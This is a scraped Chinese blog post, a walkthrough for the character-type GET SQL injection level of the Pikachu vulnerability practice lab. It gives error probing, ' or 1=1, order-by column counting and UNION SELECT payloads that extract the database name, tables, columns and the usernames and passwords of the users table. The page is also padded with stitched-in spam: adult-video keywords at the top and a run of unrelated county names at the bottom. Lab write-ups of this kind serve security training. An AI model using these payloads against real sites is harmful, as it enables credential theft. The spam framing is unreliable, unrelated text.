最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~

2023-03-09 00:28 作者:Yukito_online  | 我要投稿

ok,廢話不多說,上菜!

字符型注入的檢測方式和數(shù)字型差不多只是多加了一個(gè)引號有時(shí)還需要閉合括號

burp和postman我懶得開了,hackbar就夠了,可以去Firefox擴(kuò)展商店下載一個(gè)

注入點(diǎn)在name參數(shù)

輸入‘報(bào)錯(cuò),表示存在字符型注入

輸入' or 1=1--+輸出全部用戶,繼續(xù)用order by判斷字段

' order by 3--+時(shí)報(bào)錯(cuò)說明存在兩個(gè)字段

下面就是跟整數(shù)型一樣,拿庫名拿表名拿列名拿數(shù)據(jù)


' union select version(),database()--+
' union select 1,table_name from information_schema.tables where table_schema='pikachu'
' union select 1,column_name from information_schema.columns where table_name='users'--+
' union select username,password from users--+

收工,睡覺

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection字符型注入(get)通關(guān)指南pika~pika~的評論 (共 條)

分享到微博請遵守國家法律
禄丰县| 临安市| 镇远县| 平江县| 子长县| 肃宁县| 特克斯县| 云南省| 福泉市| 邯郸县| 萨迦县| 赣榆县| 临武县| 汶上县| 天全县| 科尔| 临夏市| 洮南市| 普格县| 资兴市| 项城市| 威宁| 新巴尔虎左旗| 内江市| 金川县| 南阳市| 富阳市| 荥经县| 佛冈县| 秦皇岛市| 张家口市| 门源| 紫阳县| 西平县| 龙井市| 耿马| 深州市| 镇赉县| 原平市| 香河县| 万山特区|